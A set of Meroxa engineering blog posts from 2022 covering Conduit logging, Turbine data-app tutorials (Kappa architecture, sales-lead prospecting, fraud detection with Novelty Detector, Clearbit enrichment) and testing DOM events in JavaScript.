Send everything to the same place. Create consistency and reduce the decision overhead.

Building connectors in Conduit is fairly straightforward. We made it easy for any developer that wants to build a connector to do so without having to tightly couple their work to Conduit itself. (I highly recommend you read our post on how we use Buf to make that experience possible.) One of the main benefits of loose coupling is a developer can build a connector at their own pace in a separate repository. This also can lead to some potential drawbacks. The main drawback is a connector can create their own experiences that are decoupled from the main Conduit experience. In the Kafka Connect ecosystem, you can see how this plays out because logs from the connectors can be emitted anywhere they choose. Plus, you’ll be required to set any configuration for logging on a per connector basis.

Conduit encourages good connector logging experiences from the get-go via the Conduit Connector SDK. The SDK has the facilities for logging built in. Arguably, a connector developer could try to emit logs to a place they choose and then use the Conduit Connector Configuration to control it but that would require more effort than going down the happy path.

The Conduit Connector SDK can also bring structure to what’s being emitted on each of the log lines. Every log line will always have the same set of information in the same order. Structure and consistency are super important because developers can come to rely on the information always having the same shape. Without consistency, implicit behaviors exist within systems. Implicit behaviors in a system result in frustration for developers because work will need to be done to build around them if they’re not fully documented.

Conduit is even bringing this experience to Kafka Connect Connectors themselves! Conduit can run Kafka Connect Connectors via the wrapper we built and we recognize how logging can be a pain. We’re actively working to fix so that your Kafka Connect Connectors can emit their logs to the same place as the Conduit logs. No extra work needed!

What are you asking the developer or operator to learn

One of the biggest gripes is being forced to use another tool to understand the tool that you’re supposedly trying to operate. In development, having to use another tool can be a deal breaker. In Conduit, if something needs to be communicated to the developer, we do it via the logs including the metrics. You might conclude that the Conduit logs could be overly verbose but this is where log levels are critical. The Conduit Connector SDK has facilities for marking logs at many different levels courtesy of the Zerolog package in Go. As the user of Conduit, you can then filter out various levels based on your needs. The benefit of all of this is that it’s text-based and any developer coming from any programming language ecosystem can quickly get the information they need to debug what’s happening.

One of the biggest gripes the Conduit team hears from developers about Kafka Connect is that they have to use JMX to understand what’s happening under the hood. We don’t hear this from developers that have Java backgrounds, this is from developers who’s primary language isn’t Java (e.g. Javascript, Python, Go). Arguably, this disincentivizes developers from these other language ecosystems. From a Conduit perspective, all the metrics for what’s happening under the hood are emitted in a metrics endpoint (e.g. `/metrics`). Nothing fancy is needed beyond using `curl` in your terminal or a web browser. The benefit of this approach is that the developer can quickly see what’s happening on their own machines while the same API endpoint can be use to connect to data collection tools like Prometheus or Datadog.

Principles Matter for Backend Systems

The principles outlined in the blog post are just a few the Conduit team abides by and how they’re applied specifically to metrics and logs. Principles are important because they improve decision-making not only for the team but how we guide open-source contributions in the community. Principles will also ensure consistency in the product experience across the board.

Give Conduit a try! If you like what you see, follow us on Twitter @conduitIO or join us on Discord to share your experiences and how we could make it better.

Real-Time Analytics Using the Kappa Architecture in ~20 Lines of Code with Turbine, Materialize, Spark, & S3

DeVaris Brown — Thu, 01 Sep 2022 20:24:55 GMT

In 2014, Jay Kreps wrote a blog post detailing the Kappa Architecture as a way to simplify the existing Hadoop based architecture for processing data. The Kappa Architecture, as seen in the below diagram, leverages a streaming service like Apache Kafka to be the main source of data removing the need to store data into a filesystem like HDFS for batched based processing.

While the benefits of the Kappa Architecture are numerous, operating and maintaining the various infrastructure components for ingestion, streaming, stream processing, and storage is no trivial task. The Meroxa platform and our Turbine SDK make it trivial to deploy and leverage the Kappa Architecture in the below diagram in as few as 20 lines of code.

Show Me the Code!

We’re going to bring the above diagram to life with Meroxa’s Turbine Go SDK. Turbine currently supports writing data applications in Go, Python, and JavaScript with more languages coming soon.

Turbine Data App Requirements

Adding PostgreSQL, S3, and Materialize Resources to the Data Catalog with the Meroxa CLI

The first step in creating a data app is to add the S3 and PostgreSQL resources to the Meroxa catalog. Resources can be added via the dashboard, but we’ll show you how to add them to the catalog via the CLI.

Adding PostgreSQL (docs)

$ meroxa resource create pg_db \\
  --type postgres \\
  --url "postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB" \\
  --metadata '{"logical_replication":"true"}'

If your database supports logical replication, set the metadata configuration value to true.

Adding S3 (docs)

$ meroxa resource create dl \\
  --type s3 \\
  --url "s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET"

Adding Materialize (docs)

Materialize is wire-compatible with PostgreSQL, which means we can use the standard connection string format.

$ meroxa resource create mz_db \\
  --type materialize \\
  --url "postgres://$PG_USER@$PG_URL:$PG_PORT/$PG_DB"

Initializing a Turbine Go Data App

$ meroxa apps init pg_kappa --lang go

When initializing the Turbine app, you’ll see we include many comments and boilerplate to help you get up and going. We removed most of this for this example, but take a look around and even execute meroxa apps run to see the output of our sample app.

Creating the Kappa Architecture with Turbine

Inside of the main App we can ingest the data from our PostgreSQL DB(pg_db) and orchestrate in real-time to our destinations Materialize(mz_db) and AWS S3(dl) as seen in the code block below. We’ll take data from the orders table using change data capture (CDC). Every time there is a change in the PostgreSQL source, our Turbine data app will keep our destinations in sync.

func (a App) Run(v turbine.Turbine) error {
	source, err := v.Resources("pg_db") // create connection to Postgres db
    if err != nil {
    	return err
    }
    rr, err := source.Records("orders", nil) // ingest data from orders table
    if err != nil {
    	return err
    }
    
    materialize, err := v.Resources("mz_db") // create connection to Materialize db
    if err != nil {
    	return err
    }
    
    datalake, err := v.Resources("dl") // create connection to AWS S3 data lake
    if err != nil {
    	return err
    }
    
    err = materialize.Write(rr, "orders") // stream orders data to Materialize
    if err != nil {
    	return err
    }
    
    err = datalake.Write(rr, "dl_raw") // stream orders data to AWS S3
    if err != nil {
    	return err
    }
    
    return nil
}

Now that the data is flowing, you can use a BI tool like Metabase to query the data in Materialize for real-time data analysis or to build dashboards.

Processing Data from S3 with Spark

As data flows into your data lake in real-time, you can process and analyze it utilizing Spark. In S3, Turbine stores the data from PostgreSQL as one line, gzipped JSON as seen below.

Postgres CDC data in S3

The schema of the gzipped record looks like the following:

{
    "schema": {
        "name": "turbine-demo",
        "optional": false,
        "type": "struct",
        "fields": [
            {
                "field": "id",
                "optional": false,
                "type": "int32"
            },
            {
                "field": "email",
                "optional": true,
                "type": "string"
            }
        ]
    },
    "payload": {
        "id": 1,
        "email": "devaris@devaris.com"
    }
}

To read that data in Spark and write out to another S3 bucket, it’s pretty trivial to do with [PySpark](https://spark.apache.org/docs/latest/api/python/#:~:text=PySpark is an interface for,data in a distributed environment) as seen below.

import pyspark

# Set up a Spark Session and your S3 config
from pyspark import SparkConf
from pyspark.sql import SparkSession

conf = SparkConf()
conf.set('spark.jars.packages', 'org.apache.hadoop:hadoop-aws:3.2.0')
conf.set('spark.hadoop.fs.s3a.aws.credentials.provider', 'org.apache.hadoop.fs.s3a.TemporaryAWSCredentialsProvider')
conf.set('spark.hadoop.fs.s3a.access.key', )
conf.set('spark.hadoop.fs.s3a.secret.key', )
conf.set('spark.hadoop.fs.s3a.session.token', )

spark = SparkSession.builder.config(conf=conf).getOrCreate()

# Read data from the CSV
df = spark.read.json("s3a://dl_raw/file.jl.gz")

# Do some processing on the dataframe then write to a new bucket in CSV format
df.write.format("csv").option("header","true").save("s3a://dl_processed_csv")

Deploying

Now that the application is complete, we can deploy the solution in a single command. The Meroxa Platform sets up all the connections and orchestrates the data in real-time so you don’t have to worry about the operational complexity.

$ meroxa apps deploy pg_kappa

Conclusion

The Meroxa platform and our Turbine SDK take the complexity out of operating and leveraging the Kappa Architecture. With less than 20 lines of code, we were able to deploy a solution that enables real-time analytics with Materialize and leveraged Spark’s stream processing for ML, Data Science, etc… in a separate workflow.

We can’t wait to see what you build 🚀

Get started by requesting a free demo of Meroxa. Your app could also be featured in our Data App Spotlight series. If you’d like to see more data app examples, please feel free to make your request in our Discord channel.

Better Test User Interactions in JavaScript Apps with Emulated Events

Jesse Jordan — Mon, 29 Aug 2022 23:45:25 GMT

For over a decade, single-page web applications have been on the rise and continue to be a popular medium for modern web experiences today. Digital products such as Twitter, Gmail, LinkedIn, and Netflix, as well as our dashboard at Meroxa, are such JavaScript applications and are served to billions of users every day.

To guarantee the delivery of high-quality software, engineering teams implementing modern web applications must not only dedicate time to the development of new features or the maintenance of already existing code, but also to the verification of application behavior through manual and automated testing.

When it comes to automated testing of JavaScript applications, it is key to verify the application state is changing as expected over time. The state of JavaScript applications is defined by a continuous sequence of user interactions and browser events. In some cases, the actual user interaction can not be replicated in a test easily — but the underlying events may be.

By emulating the DOM (Document Object Model) events in our automated tests, we get closer to mimicking our app’s behavior accurately. In this article, you’ll learn what DOM events are and how you can leverage them in your testing approach for more reliable test coverage.

What is a DOM event?

A DOM event signals occurrences in a web app, such as a user interaction (e.g. a user hovering over a button element) or another event-triggering action, that is unrelated to user behavior (e.g. the browser finishing to load a web page). DOM events can be used to run a single or a set of multiple functions inside of a JavaScript application, at a specific point in time — specifically whenever the associated DOM event is triggered.

User interactions prompt many of the DOM events in a JavaScript application’s lifecycle. For example, a user may use a mouse or keyboard device to activate a <button> element, triggering many DOM events while doing so, including, but not limited to the click event.

Here’s a typical sequence of the DOM events sent whenever a button is clicked using a mouse device:

pointerover
pointerenter
mouseover
pointerrawupdate
pointermove
mousemove
pointerdown
mousedown
focus
pointerup
mouseup
click
blur

In a test environment, e.g. when running our JavaScript application in the context of an automated Jest or QUnit test run, it may be helpful for us to emulate such user interactions to verify that the event-driven features we have implemented are working as expected.

But how can you assert the sequence of events and associated app state changes in your JavaScript tests? Let’s take a look at an example component.

Example: Automated testing of file uploads

Imagine we were building an amazing file upload component that allows users to click a button to browse for a file on their machine, select it and then subsequently upload its content to the app.

If we wrote our app using EmberJS, as we’re doing for our open-source component library mx-ui-components at Meroxa, the component may be structured similarly to this:

And in a similar fashion, we may want to build such a component in a React library like this:

In a production environment, a user can now upload their files using the <Upload> component by clicking the Browse file button and selecting their file from their local machine.

In our test suite, natively executing the full user interaction would be impossible: when our tests run in our continuous integration workflow, we won’t have easy access to the file directory of the remote machine from which a file is supposed to be selected for upload.

Instead of uploading a real file in our automated test, we can emulate the file upload event that results from the user interaction; this way, we can test if any associated event listeners and subsequent state changes in our JavaScript app are working as expected.

While building a web application using a JavaScript framework, you may benefit from the comfort of using compatible testing libraries, such as QUnit, @ember/test-helpers or Jest in combination with @testing-library/react, which will make emulating custom events even easier.

Let’s leverage Ember ’s triggerEvent function to test the file upload behavior of our <Upload /> component shown earlier:

In a React app on the other hand, we can assert the same user flow using the handy helper methods from @testing-library in a similar manner:

Other approaches for testing events in your tests

If you don’t have a developer-friendly testing library for your use case, you can create your own testing helper library for easy reuse in many different JavaScript-based projects.

Mimicking common user actions in plain JavaScript

Many HTML elements have built-in methods for programmatically triggering common user interactions on them, which makes testing user flows more straightforward.

For example, if we wanted to mock a user clicking a button element, we could emulate this as follows in our integration test:

Sometimes we would like to assert an application state change in our automated test that is elicited by a DOM event for which there is no corresponding DOM element method, such as element.click.

What if we updated our app state anytime a user was starting and stopping to hover over the button mentioned in the example above, regardless if the button was clicked or not? In that case, we might want to emulate the mouseenter and mouseleave events instead and verify that our JavaScript application is still behaving as expected.

Emulating any DOM event

For such test scenarios based on less common DOM events, we can leverage the dispatchEvent API:

The dispatchEvent() method of the EventTarget sends an Event to the object, (synchronously) invoking the affected EventListeners in the appropriate order.

from the MDN docs on dispatchEvent

Any DOM event can be programmatically triggered where needed, by calling the dispatchEvent method on the target element:

In our file upload component example from above, we could write our own test helper to emulate the feature functionality. Using the dispatchEvent method in combination with the change event in our test helper util already does the trick:

That’s a wrap!

Whether you’re using a framework or plain old JavaScript to build out your web apps and components, testing event-driven behavior has never been easier. By using testing libraries or comprehensive Web APIs, emulating events in unit and integration tests is a breeze.

Have thoughts, questions or recommendations on how you can test events in JavaScript? Let us know in the Meroxa community or on Twitter at @meroxadata!

References

mx-ui-components: https://github.com/ConduitIO/mx-ui-components
dispatchEvent Web API: https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/dispatchEvent
Document Object Model Events: https://www.w3.org/TR/DOM-Level-2-Events/events.html
QUnit: https://qunitjs.com/
Ember: emberjs.com
Ember Test Helpers API: https://github.com/emberjs/ember-test-helpers/blob/master/API.md
React: https://reactjs.org/
Jest: https://jestjs.io/
@testing/library: https://testing-library.com/

Prospector: Turbine Data App for Generating Qualified Sales Leads

DeVaris Brown — Thu, 25 Aug 2022 18:23:06 GMT

Like many early-stage startups, being stretched thin for resources is commonplace. We recently hired a VP of Sales to execute our go-to-market strategy. However, we quickly realized sourcing new leads was a bottleneck without dedicated SDR resources.

After speaking with Jamie, I realized parts of the lead generation process could be automated with a data application that wouldn’t require us to use a combination of expensive SaaS platforms. We would need to develop a way to query and search companies with specific criteria, find contact information for our ideal customer profile at the company, and send them a message. We came up with the following workflow:

The sales team can query Crunchbase and export a CSV. This could be automated via their API, but it would require us to sign a pricey Enterprise agreement. The engineering team built a S3 uploader for the sales team to upload the exported CSVs to an AWS S3 bucket so the Meroxa Turbine data app can take over. Once we have the company URL, we can query external APIs for enrichment before orchestrating the data into Salesforce. Once that is complete we can send it to Slack to notify the sales team of a new lead has been created and then send it onto Postgres for additional analysis with SQL.

Show Me the Code!

Turbine Data App Requirements

Node JS
Meroxa account
Meroxa CLI
Meroxa supported PostgreSQL DB
AWS S3 bucket
Crunchbase account (Paid)
PredictLeads account (Paid)
Apollo (Paid)
Salesforce account (Paid)
Slack account

Adding S3 and Postgres Resources to the Data Catalog with the Meroxa CLI

The first step in creating a data app is to add the S3 and PostgreSQL resources to the Meroxa catalog. Resources can be added via the dashboard, but we’re going to show you how to add them to the catalog via the CLI.

Adding S3 (docs)

$ meroxa resource create datalake \\
  --type s3 \\
  --url "s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET"

Adding Postgres (docs)

$ meroxa resource create pg_db \\
  --type postgres \\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\
  --metadata '{"logical_replication":"true"}'

If your database supports logical replication, set the metadata configuration value to true.

Initializing a Turbine JavaScript Data App

$ meroxa apps init prospector --lang js

When you initialize the Turbine app, you’ll see we include many comments and boilerplate to help you get up and going. We’ll remove most of this for this example, but take a look around and even execute meroxa apps run to see the output of our sample app.

Cleaning the CSV data from Crunchbase

In Crunchbase, we can do searches like find all private, active companies that have raised a series A in the last year. It returns a table that looks like the following:

When we export the table to CSV, the website URL format is https://www.[incident.io](<http://incident.io>)/. To search PredictLeads, our URL needs to be incident.io according to their docs. We need to write private functions in our Turbine app that remove the protocol (http:// or https://), remove the www, and remove the trailing slash. No need to set up an orchestration system (Airflow, Dagster, Prefect) or complex stream processing platform (Spark, Flink, et al) in order to accomplish this. We can transform the URL with plain old Javascript as seen below.

function cleanURL(companyUrl) {
	let noProtocol = removeHttp(companyUrl);
    let noWWW = removeWWW(noProtocol);
    let noSlash = removeSlash(noWWW);
    return noSlash;
}

// Remove protocol, www, and trailing slash from URL
function removeHttp(url) {
	return url.replace(/^https?:\\/\\//, "");
}

function removeWWW(noProtocol) {
	return noProtocol.replace(/^www\\./, "");
}

function removeSlash(noWWW) {
	return noWWW.replace(/\\/$/, "");
}

Searching Job Descriptions with PredictLeads

The PredictLeads API allows us to search a company’s job descriptions. In our case, if a company is hiring data-specific roles (e.g. Data Engineering, Analytics Engineering, etc…), they could potentially be a Meroxa customer. We send the cleanURL to another private function searchJobTitles that returns an object containing the companyUrl and jobTitle.

async function makePLRequest(companyUrl) {
	const searchTitle = "Data";
    
    try {
    	const response = await axios.get(
        	`https://predictleads.com/api/v2/companies/${companyUrl}/job_openings`,
            {
            	headers: {
                	"X-User-Email": process.env.PL_EMAIL,
                    "X-User-Token": process.env.PL_TOKEN,
                },
            }
        );
        
        if (response.status == 200) {
        	response.data.data.forEach((job) => {
            	const jobTitle = job.attributes.title;
                const companyName = job.attributes.
                
                if (jobTitle.search(searchTitle) > 0) {
                	console.log({ companyUrl, jobTitle });
                }
            });
        }
    } catch (error) {
    	console.error(error);
    }
}

Finding Contacts with Apollo

Next, we use the Apollo API to find a contact at our target company. Apollo’s API can search job postings, but for the sake of making things more complex to showcase the Meroxa platform we scoped down Apollo’s usage to find contacts. We pass in our companyUrl, to the findIcpAtCompany private function and return the contact information with

async function findIcpAtCompany(companyUrl) {
	try {
		const contactResults = await findContactByRole(jobTitle, companyUrl);

        let icpInfo = {
            name: contactResults.people[0].name,
            linkedinUrl: contactResults.people[0].linkedin_url,
            jobTitle: contactResults.people[0].title,
            photo: contactResults.people[0].photo_url,
            email: contactResults.people[0].email,
            company: contactResults.organization.name,
            website: contactResults.organization.website
        }

        return icpInfo;
    } catch (error) {
    	console.error(error);
    }
}

async function findContactByRole(jobTitle, companyUrl) {
    try {
    	const response = await axios.post("https://api.apollo.io/v1/people/match", 
        	{
                headers: {
                    "Content-Type": "application/json",
                    "Cache-Control": "no-cache"
                },
                data: {
                    "api_key": process.env.APOLLO_API_KEY,
                    "q_organization_domains": companyUrl,
                    "person_titles": `[${jobTitle}']
                }
        	}
        );
    } catch (error) {
    	console.error(error);
    }
    return response;
}

Sending Leads to Salesforce

Now that we have all of our data we can send it to Salesforce via their API. While we do have a Salesforce connector available via Conduit, I wanted to showcase Turbine’s ability to leverage both the Meroxa platform and regular code for data movement. To send data into Salesforce, I will use the jsforce Node.js library.

const jsforce = require('jsforce');

async function sendToSalesforce(companyInfo) {
    var conn = new jsforce.Connection({
        instanceUrl : process.env.SFDC_URL,
        accessToken : process.env.SFDC_ACCESS_TOKEN
    });

    try {
        await conn.subject("Account").create(
            { Name : `$companyInfo.name` }, // add whatever fields you want here
            function(err, ret) {
                if (err || !ret.success) { return console.error(err, ret); }
                console.log("Created record id : " + ret.id);
            }
        )
    } catch (error) {
        console.error(error);
    }
}

Notifying the Sales Team in Slack

Once a new lead is in Salesforce, we want to notify the sales team in their Slack channel so they can begin outreach. You’ll need to get a token from the Slack settings and in this case I’m using a bot user token so I can post as the Prospected app. If I want to format the message, I could include a blocks object

async function sendSlackNotification(companyInfo) {
    const slackToken = process.env.SLACK_BOT_USER_TOKEN;
    run().catch(err => console.log(err));
    
    async function run() {
        const url = 'https://slack.com/api/chat.postMessage';
        const res = await axios.post(url, {
                channel: '#sales',
                icon_emoji: ':moneybag:',
                username: 'Prospector',
                text: `New Contact: ${companyInfo}`
        	}, { headers: { authorization: `Bearer ${slackToken}` } 
        });

    	console.log('Done', res.data);
    }
}

Completing the Turbine Data App

Now that we have all the functions completed, the last step is to wire this up to orchestrate the data. We added a PostgreSQL resource as seen below for future analysis or to power a more full-featured dashboard.

// Import statements
// Main app code
exports.App = class App {
	digForGold(csvFiles) {
		csvFiles.forEach((csv) => {
		fs.createReadStream(csvLocation)
			.pipe(csv({ headers: true, skipLines: 1 }))
            .on("error", (error) => console.error(error))
            .on("data", (data) => makeRequest(data))
            .on("end", () => {
            	console.log("done");
            });
	}
    
    async function makeRequest(data) {
        const companyUrl = data["_10"];
        const company = cleanURL(companyUrl);

        const plResults = makePLRequest(companyUrl);
        const contactInfo = findIcpAtCompany(companyUrl);
        const sfdcResponse = sendToSalesforce(contactInfo);
        const slackResponse = sendSlackNotifcation(contactInfo);
    }

    async run(turbine) {
        let source = await turbine.resources("s3");
        let destination = await turbine.resources("postgres");
        let csvFiles = await source.records("s3BucketName");
        let prospected = await turbine.process(csvFiles, this.digForGold)
        let analytics = await destination.write(prospected, "salesLeads");
    }
}

Conclusion

This was one of the more complex use cases, but it helped exercise and showcase the power of Turbine. There’s so much power in leveraging plain code interspersed with the advantages Turbine provides. For obvious reasons, we aren’t open sourcing this app 😊 but if you have questions, please contact us via our Discord channel or at support@meroxa.com.

If you’d like to see more data app examples, please feel free to make your request in our Discord channel. Otherwise, Get started by requesting a free demo of Meroxa and build something cool. Your app could also be featured in our “Data App Spotlight” series.

Real-Time Fraud Detection with Turbine and Novelty Detector

Co-authored by Meroxa and thatDot — Wed, 17 Aug 2022 17:16:01 GMT

Most fraud detection is based on numeric data. Why? Because it's easier. Categorical data is hard to analyze and virtually impossible to analyze in real-time. Behavioral and profile data can provide the necessary info to detect an anomaly. And we’re not talking about just scoring the categorical data in order to make the models easier. With Meroxa Turbine and thatDot Novelty Detector accessing and analyzing categorical data just got a lot easier.

Turbine is Meroxa’s a real-time data application framework that makes it easy to turn your data pipelines into data applications. The vision for the Meroxa Data Platform and Turbine is to empower Software Engineers to build and deploy Data Apps; data processing applications that manipulate, enrich and analyze data that solve problems and derive value for the business.

An appealing aspect of the Turbine framework is that it enables the use of highly specialized tools such as thatDot’s Novelty Detector product. Novelty Detector is a real-time anomaly detection tool that uses categorical data to help you find anomalies in your data that you may not have otherwise been able to find while greatly reducing false positives.

Together, these two tools can help you build a data infrastructure powerful enough to handle large volumes of data and that can quickly identify anomalies. This can be a valuable addition to any software stack, as it can help you and your customers avoid costly mistakes and quickly identify and fix problems.

In this blog we’ll outline a simple Turbine Data App that leverages Novelty Detector to highlight novel, noteworthy or otherwise interesting user activities in real-time.

Prerequisite:

Setup your Novelty Environment and obtain credentials.
Clone the example to your local machine:

git clone git@github.com:meroxa/novelty.git

Since this example uses Go, you will need to have Go installed.

How it works:

The novelty Turbine app takes use of activity data (e.g. user A carried out action B at time T) from a PostgreSQL database and streams it in real-time to the Novelty Detector server. The Novelty Detector server scores each "observation" for novelty, adding some additional anomaly metadata, which is then injected back into the PostgreSQL database.

Here’s an example Novelty Detector response payload:

{
	"observation": [
		"my",
        "sample",
        "observation"
    ],
	"score": 0.36231689108923804,
	"totalObsScore": 0.36231689108923804,
	"sequence": 3,
	"probability": 0.6666666666666666,
	"uniqueness": 0.9943363088569088,
	"infoContent": 0.5849625007211563,
	"mostNovelComponent": {
		"index": 2,
		"value": "observation",
		"novelty": 0.5849625007211563
	}
}

A full explanation of each field of the payload can be found on the Novelty Detector Usage Guide here but it is worth noting a few of the more interesting payload elements:

observation - simply the observation originally passed into Novelty Detector, included for reference.
score - The score is the total calculation of how novel the particular observation is. The value is always between 0 and 1, where zero is entirely normal and not-anomalous, and one is highly novel and clearly anomalous.
mostNovelComponent - an object, consisting of index, value, and novelty that indicates just how novel is the most novel component of the observation, indicated by index + value.

A key aspect of Novelty Detector, and one of the reasons it pairs so well with Turbine, is its simplicity of operation: once you have connected Turbine to Novelty Detector, it starts scoring observations without requiring any other configuration or setup.

Code:

The core of the Data App looks much like any typical Turbine app, but there are a couple of sections worth digging into.

func formatObservation(r turbine.Record) []string {
	country := r.Payload.Get("country").(string)
	city := r.Payload.Get("city").(string)
	email := r.Payload.Get("email").(string)
	userID := r.Payload.Get("user_id").(float64)
	tsFloat := r.Payload.Get("timestamp").(float64)
    tod, err := timeOfDay(fmt.Sprint(int(tsFloat)))
    
    log.Printf("tod: %+v", tod)
    
    if err != nil {
		log.Printf("error in formatObservation: %s", err.Error())
		return nil
	}
    
    obs := []string{tod, country, city, email, fmt.Sprint(userID)}
	log.Printf("obs: %+v", obs)
	return obs
}

Here we’re formatting the observation as an array of categorical data, starting with the value with the lowest cardinality (or the most significant).

A particularly interesting optimization is the bucketing of time data in the form of the timeOfDay function.

func timeOfDay(t string) (string, error) {
	intTime, err := strconv.ParseInt(t, 10, 64)

	if err != nil {
		return "", err
	}

	ts := time.Unix(intTime, 0)

	splitAfternoon := 12
	splitEvening := 17
	splitNight := 21

	if ts.Hour() < splitAfternoon {
		return "morning", nil
	}
    
	if ts.Hour() >= splitAfternoon && ts.Hour() < splitEvening {
		return "afternoon", nil
	}
    
	if ts.Hour() >= splitEvening && ts.Hour() < splitNight {
		return "evening", nil
	}

	return "night", nil
}

The function takes a unix timestamp value and maps it to morning, afternoon, evening or night.

You can find the full example for this data app on GitHub. We can't wait to see what you build 🚀

Additional resources:

Watch a replay of our Real-Time Categorical Data-Based Anomaly Detection webinar
Join the Meroxa Community
Learn more about thatDot’s Novelty Detector

Real-Time Data Enrichment for Data Activation Using Meroxa Turbine and Clearbit

DeVaris Brown — Thu, 04 Aug 2022 16:44:20 GMT

Data activation, or reverse ETL, is the process of pulling data from your data warehouse and making it actionable by your business users in their preferred tooling. One of the main ingredients for data activation is data enrichment. Data enrichment enhances existing data by supplementing missing or incomplete data with information from internal or external sources.

As seen in the diagram below, we see a typical architecture for data activation. Once a data record reaches the warehouse, a service acts upon that record, enriches it with data (internal or external), and places it in whatever destination a stakeholder needs.

The data activation pattern can be used for a number of use cases, including the following:

Customer Service - Gather customer details, support history, and purchase activity all in one place to provide a more tailored experience

Sales - Access more detailed information about leads and their engagement activity can increase conversion and renewals

Marketing - Create personalized and targeted campaigns based on activity to improve lead generation efforts

Using Meroxa to Simplify and Turbocharge Data Activation

By using Meroxa’s Turbine Application Framework, you can simplify the data activation process by reducing the need to use multiple point solutions for transformation and reverse ETL with code.

In the above diagram, the Meroxa Turbine data app cleans and enriches events from various data sources in real time, so the data is already in a consumable format when it reaches the destination. This saves data-driven organizations considerable amounts of money, resources, and time.

Show Me the Code!

In this example, we use Go to pull records from a PostgreSQL database, enrich a record, and put it back into another table in the same PostgreSQL database. The destination can be any resource Meroxa officially supports, including Snowflake, S3, Salesforce, etc…

💡 If you want to skip the tutorial to see the full example, check out the Github repo.

Requirements

Adding a PostgreSQL Resource to the Meroxa Catalog

The first step in creating a data app is to add the PostgreSQL resource to the Meroxa catalog. If your database supports logical replication, set the metadata configuration value to true.

$ meroxa resource create pg_db \\
  --type postgres \\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\
  --metadata '{"logical_replication":"true"}'

Initializing a Turbine Data App

$ meroxa apps init meroxa-clearbit --lang golang

When you initialize the Turbine app, you’ll see we include a ton of comments and boilerplate to help you get up and going. We’ll be removing most of this for this example, but take a look around and even execute meroxa apps run to see the output of our sample app.

Clearbit Helper Function

The helper below uses the clearbit-go package to wrap a helper function around Clearbit’s combined enrichment API. Essentially it takes an email address and returns details on the associated person and company. The helper takes the result and returns a nicely formatted UserDetails struct.

package main
import (
  "github.com/clearbit/clearbit-go/clearbit"
  "log"
  "os"
)

type UserDetails struct {
	FullName        string
    Location        string
    Role            string
    Seniority       string
    Company         string
    GithubUser      string
    GithubFollowers int
}

func EnrichUserEmail(email string) (*UserDetails, error) {
	key := os.Getenv("CLEARBIT_API_KEY")
    client := clearbit.NewClient(clearbit.WithAPIKey(key))
    results, resp, err := client.Person.FindCombined(
    	clearbit.PersonFindParams{
    		Email: email,
    	}
    )

    if err != nil {
        log.Printf("error looking up email; resp: %+v", resp.Status)
        return nil, err
    }

    return &UserDetails{
        FullName:        results.Person.Name.FullName,
        Location:        results.Person.Location,
        Role:            results.Person.Employment.Role,
        Seniority:       results.Person.Employment.Seniority,
        Company:         results.Company.Name,
        GithubUser:      results.Person.GitHub.Handle,
        GithubFollowers: results.Person.GitHub.Followers,
   }, nil
}

Modifying app.go

This section of the app defines the main topology of the Data App. Here you can see that we’re referencing a collection (or table) called user_activity from a resource named pg_db. This is specifically a PostgreSQL database with a table called user_activity but Turbine (and the Meroxa platform) abstract that away so you only really need to worry about the name of the resource and the collection that you’re interested in accessing.

We then process that collection via EnrichUserData (detailed below) and ultimately output the results from db into a collection named user_activity_enriched.

In order to hit the Clearbit API, we have to provide an API Key. The RegisterSecret method makes that available to the function by mirroring the environment variable into the context of the function.

func (a App) Run(v turbine.Turbine) error {
	db, err := v.Resources("pg_db")
    
    if err != nil {
    	return err
    }
    
    stream, err := db.Records("user_activity", nil) // stream is a collection of records, can't be inspected directly
    
    if err != nil {
    	return err
    }
    
    err = v.RegisterSecret("CLEARBIT_API_KEY") // makes env var available to data app
    
    if err != nil {
    	return err
    }
    
    res, _ := v.Process(stream, EnrichUserData{}) // function to be implemented
    
    err = db.Write(res, "user_activity_enriched")
    
    if err != nil {
    	return err
    }
    
    return nil
}

Enriching Data with Functions

Each record will be processed by the EnrichUserData function, as seen below. When the program is compiled, this function will be extracted via reflection. Meroxa will automatically create the DAG and orchestrate the data through each component(DB > function > DB).

We included some additional magic on the Payload methods (more info here). The.Set method allows Turbine to modify the payload without having to worry about the underlying format or schema.

type EnrichUserData struct{}

func (f EnrichUserData) Process(stream []turbine.Record) []turbine.Record {
	for i, record := range stream {
    	log.Printf("Got email: %s", record.Payload.Get("email"))
        UserDetails, err := EnrichUserEmail(record.Payload.Get("email").(string))
        
        if err != nil {
        	log.Println("error enriching user data: ", err)
            break
        }
        
        log.Printf("Got UserDetails: %+v", UserDetails)
        err = record.Payload.Set("full_name", UserDetails.FullName)
        err = record.Payload.Set("company", UserDetails.Company)
        err = record.Payload.Set("location", UserDetails.Location)
        err = record.Payload.Set("role", UserDetails.Role)
        err = record.Payload.Set("seniority", UserDetails.Seniority)
        if err != nil {
        	log.Println("error setting value: ", err)
            break
        }
        
        rr[i] = r
   }
   
   return rr
}

Testing Locally and Deploying to Production

Modify your app.json to match your resource name and fixture file location. In this example, our fixtures are in fixtures/pg.json

"resources": {
	"pg_db": "fixtures/pg.json"
}

The pg.json file should have a property that matches the collection specified in app.go. In this example, we’re using user_activity. Our app will take the email address in the payload object, send it to Clearbit, and return the data we specified in clearbit.go.

Data record before running meroxa apps run

"payload": {
	"activity": "registered",
    "updated_at": 1643214353680,
    "user_id": 108,
    "created_at": 1643214353680,
    "id": 1,
    "deleted_at": null,
    "email": "devaris@meroxa.io"
}

Data record after running meroxa apps run

"payload": {
	"activity": "logged in",
    "company": "Meroxa",
    "created_at": 1643411169715,
    "deleted_at": null,
    "email": "devaris@meroxa.io",
    "full_name": "DeVaris Brown",
    "id": 3,
    "location": "Oakland, CA, US",
    "role": "leadership",
    "seniority": "executive",
    "updated_at": 1643411169715,
    "user_id": 108
},

That looks good, so let’s deploy this data app into production by running meroxa apps deploy.

$ meroxa apps deploy
  Checking for uncommitted changes...
  ✔ No uncommitted changes!
  Validating branch...
  ✔ Deployment allowed from main branch!
  Preparing application "meroxa-clearbit" (golang) for deployment...
  ✔ Application built!
  ✔ Can access to your Turbine resources
  ✔ Application processes found. Creating application image...
